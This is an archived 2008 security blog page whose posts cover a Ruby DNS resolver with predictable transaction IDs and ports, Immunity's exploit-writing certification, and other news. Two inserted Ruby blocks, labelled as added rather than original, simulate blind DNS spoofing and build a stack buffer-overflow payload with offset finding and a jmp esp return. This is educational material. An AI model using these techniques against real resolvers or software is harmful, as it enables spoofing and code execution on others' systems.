
contact Wesley McGrew: | email - wesley@mcgrewsecurity.com | gpg key | aim - wesleymcgrew | twitter - mcgrewsecurity |

McGrew Security Blog

LOL’ing my LOL’er off at the Syngress IDA Pro Book

August 26th, 2008 | admin

I ran across this after I finished reading back-to-back reviews by Phn1x and Ilfak Guilfanov of the sounds-like-it’s-excellent “The IDA Pro Book” by Chris Eagle, from No Starch Press.  Excellent reviews, and the book looks really good.  Please don’t confuse its coolness with the lameness I’m about to copy-paste about. I’ll probably wind up buying a copy of Eagle’s book.

The Syngress IDA book, though?  Not so much.

I didn’t know Syngress had an IDA Pro book when I went to Amazon to look at No Starch’s.  There’s a reason for that:  It’s awful.  I can say this, with certainty, without ever having picked it up.  I don’t normally feel this strongly without at least reading the book, but the universally bad reviews of “Reverse Engineering Code with IDA Pro” are quite damning…

…and hilarious :).  Which is why I’m pasting select comments from the various reviews here, as they tickle my funny-bone:

ZT says:

Do we really need half a page to print a table that does nothing but list every possible form a MOV instruction can take?

..and:

For heaven’s sake, the book was published FOUR MONTHS AGO, and already the repository for the book’s source and binaries has disappeared?!  Come on, this is unacceptable. Every time the book dedicates an entire chapter to disassembling a binary, you have to pretty much skip the entire chapter, because the binary isn’t available for you to disassemble. You can’t follow along.

magicmac2000 chimes in with:

And finally, there is information in the index of a chapter, but the pages are not there! It is not a problem of my book, it is a problem of the edition itself!

Hah what?  There’s entire chunks of the book missing:

(Chapter 4) claims to have these items:
Understanding Execution Flow, Tracing Functions, Recovering Hard Coded Password, Finding Vulnerable Functions, Backtracing Execution, Crafting a Buffer Overflow.
The problem is that the editors (Syngress) forgot to include the latest three. Yes, exactly as you hear it: the editors forgot to place those pages on the book.

Even one of the authors, Justin Ferguson, gave it a negative review:

This is my second attempt at reviewing the book I helped write, Amazon continues to censor me probably because my encouragement is not to buy this book (after dealing with syngress, I wouldn’t advise buying anything that comes from them). I don’t know how to say this other than I apologize to everyone who purchased this book, it really was supposed to be much more. However the corporate world being what it is, it was rushed from deadline to deadline without any regard for quality, the editors actually introduced errors, many of the diagrams are unreadable and there’s parts of the book just flat out missing. DO NOT BUY.

Ouch!  You can check out the reviews for yourself here.  I think I’ll be getting Chris Eagle’s book instead.


Audio and video of Kaminsky’s DNS talk now available

August 25th, 2008 | admin

The kind folks who run Black Hat have gone ahead and released the audio and video of Dan Kaminsky’s talk at Black Hat USA 2008, entitled “Black Ops 2008: It’s The End Of The Cache As We Know It”, or “64K Should Be Good Enough For Anyone”.  This is the talk where he discusses the DNS flaw that has been big news lately, and even if you’re already familiar with the details, Kaminsky is a very entertaining speaker.

Thanks to blackhat.com.


The greatest hacker media archive on the net needs a home.

August 24th, 2008 | admin

Darkoz is a great guy for having maintained the archive of security/hacker conference audio and video at mirrors.easynews.com for several years.  It was a place you could find presentations from just about any conference that had been recorded.  It contained years of talks from Defcon, Blackhat, Shmoocon, HOPE, and more.  I have linked to it several times in the past on my blog, I recommend it to everyone I talk to that’s getting started out in the field, and I have personally used it as a sort of reference/tutorial library for learning various topics.  It was fast, too.  Basically I have nothing but good things to say about it.

The undoing of it, however, is that it is enormous.  For this reason, it has outgrown the hosting kindly provided by easynews, and is in search of a new home.  If you or anyone you know has a redonkulous amount of space available (around 1 terabyte for the entire thing), the bandwidth needed to serve it up, and a desire to help out the security community, please check out Darkoz’s post over on his blog.

If you don’t have the ability to do that, but you have a blog that you can use to draw some attention Darkoz’s way, please link to him.  The more eyes that hit his request, the better chance he has of finding someone kind enough to host the archive.

This archive is a great resource for the community, and I hope that it’s able to find a new home soon.


Leaner, meaner mcgrewsecurity.com

August 19th, 2008 | admin

Switching the site over to the new theme didn’t go as quickly as I had hoped, but it seems to be working now.  I’ve changed how things are organized too, so it should be easier to find things.  Most of my readers seem to be those interested in the technical guts of security, so I’ve done my best to set the ratio of content to fluff as high as possible.


Video of msramdmp being demonstrated by Intelguardians Liston and Davidoff

August 13th, 2008 | admin

I was searching for something completely different on Google’s video search and ran across this video of Tom Liston and Sherri Davidoff demonstrating cold-boot memory attacks at CanSecWest.  As I have covered before, they used my msramdmp tool to make an image of RAM:


Beaten to the punch: DNS spoofing Ruby’s Resolv library

August 13th, 2008 | admin

On the 6th, I posted hashes of a file, “the_dirt.txt”, to titillate my readership while I was busy shopping the information contained within it to TippingPoint and iDefense (in case I had a shot at monetizing it :) ).  Here are the contents of “the_dirt.txt”:

The idea here is that Ruby implements its own threading model that’s independent of the operating system’s implementation of threads.  While you can have several Ruby threads rolling at once, it’ll all show up as one process to the OS.  A nice effect of this is that Ruby threads can work the same way on multiple operating systems that may not have the same native threading model.

One problem with this is that if Ruby has to ask the operating system to do something, and that function is blocking (the thread cannot continue until the function returns), all of the Ruby threads run by that process have to wait.  Making an operating system call to do a DNS query will block all of the Ruby threads of a multithreaded application until the result is returned.  This is sub-optimal.  Ruby’s solution in this case is to carry around its own DNS resolver (called “Resolv”) that plays nicely with Ruby threads, since it’s written in Ruby itself.  It can even be used as a drop-in replacement for normal DNS resolution simply by doing a “require ‘resolv-replace’”.

The problem with this DNS resolver is that it’s probably the worst you’ve seen since Windows 95 when it comes to randomizing transaction IDs and source ports.  I noticed this when I was working out a bug in my MITM DNS Metasploit module.  Take a look at the TIDs and source ports for the first 8 requests to come out of a test script:

  1. TID = 0 , SOURCE = 53571
  2. TID = 1 , SOURCE = 53571
  3. TID = 2 , SOURCE = 53571
  4. TID = 3 , SOURCE = 53571
  5. TID = 4 , SOURCE = 53571
  6. TID = 5 , SOURCE = 53571
  7. TID = 6 , SOURCE = 53571
  8. TID = 7 , SOURCE = 53571

Anyone posting a comment pointing out the subtle pattern in these requests gets to become a charter member of the Little Kaminsky Urban Achievers.
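A sequence like the one above is all a blind spoofer needs.  As an added example, not code from the original post and not Ruby’s Resolv itself, here is a small Ruby model of the two behaviours: a resolver that hands out TIDs from a counter on one fixed source port (the pattern in the capture) and one that draws both from SecureRandom, plus a spoofer that watches a single query leave and predicts the next TID/port pair.  The wire-format helpers, the class names, the hostnames, and the port 53571 carried over from the capture are assumptions for illustration; a real attacker would also need to win the race against the legitimate answer, which the model ignores.

```ruby
require 'securerandom'

# Minimal DNS A query in RFC 1035 wire format: 12-byte header, one question.
def build_query(tid, name)
  header = [tid, 0x0100, 1, 0, 0, 0].pack('n6')   # flags: RD set; QDCOUNT=1
  qname  = name.split('.').map { |l| [l.bytesize].pack('C') + l }.join + "\x00"
  (header + qname + [1, 1].pack('n2')).b           # QTYPE=A, QCLASS=IN
end

# What a sniffer (or a spoofer) recovers from a query on the wire.
def parse_query(bytes)
  tid = bytes.unpack1('n')
  labels = []
  pos = 12
  while (len = bytes.getbyte(pos)) != 0
    labels << bytes.byteslice(pos + 1, len)
    pos += 1 + len
  end
  { tid: tid, name: labels.join('.') }
end

# Models the capture above: TID is a counter from 0, source port never changes.
class SequentialResolver
  def initialize(port: 53_571)   # port taken from the capture, for illustration
    @next_tid = 0
    @port = port
  end

  def next_query(name)
    tid = @next_tid
    @next_tid = (@next_tid + 1) & 0xFFFF
    [build_query(tid, name), @port]
  end
end

# The shape a resolver should have: 16 random bits of TID and a random ephemeral port.
class RandomizedResolver
  def next_query(name)
    tid  = SecureRandom.random_number(65_536)
    port = 1024 + SecureRandom.random_number(65_536 - 1024)
    [build_query(tid, name), port]
  end
end

# A forged reply is accepted only if it carries the TID the resolver is waiting
# for and arrives on the port it sent from; nothing else is checked.
def spoof_accepted?(resolver, name, guess)
  query, port = resolver.next_query(name)
  parse_query(query)[:tid] == guess[:tid] && port == guess[:port]
end

# Blind spoofer: watch one query leave, assume the next one is TID+1 on the
# same port, and send a single forged answer at that (tid, port) pair.
def run_attack(resolver, name)
  seen_query, seen_port = resolver.next_query(name)
  seen_tid = parse_query(seen_query)[:tid]
  spoof_accepted?(resolver, name, { tid: (seen_tid + 1) & 0xFFFF, port: seen_port })
end

# Work factor when one guess is not enough: one try per (TID, port) pair.
def guess_space(tids: 65_536, ports: 65_536 - 1024)
  tids * ports
end

if __FILE__ == $PROGRAM_NAME
  puts "sequential TID, fixed port: spoof accepted? #{run_attack(SequentialResolver.new, 'www.example.com')}"
  puts "random TID, random port:    spoof accepted? #{run_attack(RandomizedResolver.new, 'www.example.com')}"
  puts "blind guesses needed against the randomized resolver: up to #{guess_space}"
end
```

Against the sequential resolver the single forged answer lands every time; against the randomized one the attacker is back to covering on the order of 2^32 (TID, port) pairs before the real answer arrives, which is the whole point of the source-port fix that followed Kaminsky’s talk.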

Congrats to Keita Yamaguchi, Christian Neukirchen, sheepman, and Tanaka Akira (according to the ruby-lang.org announcement) for beating me to the punch on it :):

There’s a patch now, but I’ll bet pentesters will be seeing applications vulnerable to this for quite some time.


Not even GTD can save me now…

August 11th, 2008 | admin

…I’d spend a fair amount of time cleaning this inbox:

Thankfully, it’s just a glitch.  Probably something to do with GMail being a little messed up today.

2**32 minus 2, strangely enough :).

Edit: It decrements by 2 each time I click to another folder and then back to Inbox.


“I’m sorry Wesley, I can’t let you do that…”

August 9th, 2008 | admin

These are not words that I often let my own computers tell me (for long).

When it comes to controlling resources, it’s relatively easy to keep people from reading things (access controls, authentication, cryptography, etc).  We’re pretty good at that.  If we own the medium, it’s even fairly easy to keep people from writing things to it.  We can’t, however, prevent people from writing to their own media.

So what does this mean?  We have security mechanisms that work (more or less) for reading and writing, but controlling someone’s ability to copy is a Problem.

I ran into this the other day, in OS X’s Preview app, when I tried to copy and paste a quote out of a PDF:

http://mcgrewsecurity.com/img/copypdf.png

Right.  So, given:

  • An environment that I could conceivably control, instrument, or log every aspect of
  • A file format that’s typically friendly towards copying text (I highlighted the quote with a text tool, so it’s being represented as glyphs, not images I’d have to OCR or curves I’d have to put back together).
  • Permission to read

…there’s no way this kind of protection can work.  If someone has the ability to write to some media, including their own (out of your control!), then giving them read access to some data is tantamount to granting them the ability to copy as well.  Error messages like this are nothing more than polite requests.

I’d have put a tutorial on how to get around this on here, but there’s really just one step:

  1. Use Skim.  It’s nicer anyways.

Splunk FAIL

August 7th, 2008 | admin

Thanks to HD Moore for this via twitter.  Splunk ad versus linkedin profile found via google:


I can’t stop giggling.


Immunity’s NOP Certification and Visual Sploit

August 7th, 2008 | admin

If you’re lucky enough to be in Vegas these next few days for Defcon 16, you really should drop by Immunity’s booth to pick up another certification to put behind your name (apparently free).  The appropriately acronym’d NOP (Network Offense Professional) certification is more than a little tongue-in-cheek, however it’s basic enough to be a good “put up or shut up” for those who claim to have some skills and understanding of basic exploitation.

Here’s the announcement:

Immunity is proud to announce the launch of our new certification, the
Network Offense Professional (NOP) at Defcon. NOP will allow prospective
employers to know that you have the capabilities needed to understand
the complex issues at the heart of information security.

Specifically, to obtain the certification you will need to write a
buffer overflow from scratch within a certain time period. You will
first find the buffer overflow by reverse engineering a target program,
and then obtain a shell from it or execute a command. This is a hands-on
certification, not a paper test. Immunity Debugger, Immunity CANVAS, and
VisualSploit will be available to you during the certification process
to enable you to write the exploit quickly. The target process will be
running on a Windows 2000 SP4 machine.

Successfully completing the challenge will allow you to use the NOP
signifier after your name and will potentially allow you to obtain
discounts on Immunity products.

Taking the NOP certification is on a first come, first served basis. Come
to the Immunity Defcon booth and try your hand.

Any inquiries can be sent to admin_at_immunityinc.com.

Thanks,
Dave Aitel
VP Media Relations
Immunity, Inc.

It’s also meant as a way to show off just how easy Visual Sploit is to use.  I haven’t personally used it, but today, Dave posted a really great flash video demonstrating its use in developing a simple buffer overflow exploit:

Really easy stuff there.  If you understand the concepts of how buffer overflows work, then that video should show you how easy it is to throw an exploit together.  Very clean procedure:

  • Demonstrates that the return pointer can be overwritten, by passing a large string of A’s and seeing 0x41414141 in EIP
  • Finds the exact offset of the return pointer by passing a string of AAAABBBBCCCC… and seeing what winds up in EIP
  • Since the buffer is sitting at the stack pointer, an exact jump can be made to the shellcode by returning to a “jmp esp” that’s already in memory.
  • Drops a “shellcode” of “int 3” repeated, so the debugger will break and we can see that it worked.
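The four steps above, as an added Ruby example that is neither the video’s nor Immunity’s code: the cyclic pattern and offset lookup that Metasploit’s pattern_create/pattern_offset tools implement, and the assembly of the final buffer (padding, return address pointing at a “jmp esp”, then int3 bytes).  There is no target process here; the “debugger” is a stub that reads the four bytes sitting at a known offset, and the offset 268 and the jmp esp address 0xDEADBEEF are made-up values for illustration, not anything from the video.

```ruby
# Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 4-byte window is
# unique, so the value that lands in EIP tells you exactly which offset hit it.
def cyclic_pattern(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Step 1: a crash with 0x41414141 in EIP means the saved return address took our A's.
def eip_overwritten?(eip)
  eip == 0x41414141
end

# Step 2: EIP holds four pattern bytes, little-endian; find where they sit.
# Returns nil when the value did not come from the pattern.
def pattern_offset(pattern, eip)
  pattern.index([eip].pack('V'))
end

# Step 4's payload: int3 (0xCC) repeated, so the debugger breaks on landing.
def int3_shellcode(len)
  [0xCC].pack('C') * len
end

# Step 3: pad up to the return address, overwrite it with the address of a
# 'jmp esp' already in memory, and place the payload right after it, which is
# where ESP points once 'ret' has popped the address.
def build_exploit(offset, jmp_esp_addr, shellcode)
  ('A' * offset).b + [jmp_esp_addr].pack('V') + shellcode
end

# Stand-in for reading EIP in the debugger: with the saved return address at
# `offset`, these four buffer bytes are what ends up in EIP.
def simulate_eip(buffer, offset)
  buffer.b[offset, 4].unpack1('V')
end

RET_OFFSET   = 268          # assumed distance from buffer start to saved EIP
JMP_ESP_ADDR = 0xDEADBEEF   # placeholder for a real 'jmp esp' address

if __FILE__ == $PROGRAM_NAME
  crash = simulate_eip('A' * 500, RET_OFFSET)
  puts format('EIP after 500 A\'s: 0x%08x, overwritten=%s', crash, eip_overwritten?(crash))

  pattern = cyclic_pattern(500)
  offset  = pattern_offset(pattern, simulate_eip(pattern, RET_OFFSET))
  puts "offset of the return address: #{offset}"

  exploit = build_exploit(offset, JMP_ESP_ADDR, int3_shellcode(16))
  puts format('EIP with exploit buffer: 0x%08x, then %d bytes of int3',
              simulate_eip(exploit, offset), exploit.bytesize - offset - 4)
end
```

The only part the stub cannot stand in for is the real debugger run: on the actual target you read EIP out of Immunity Debugger at each step, and the jmp esp address has to come from a module that is loaded at the same address on the victim.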

Cool stuff!  Wish I was in Vegas to take the test ;)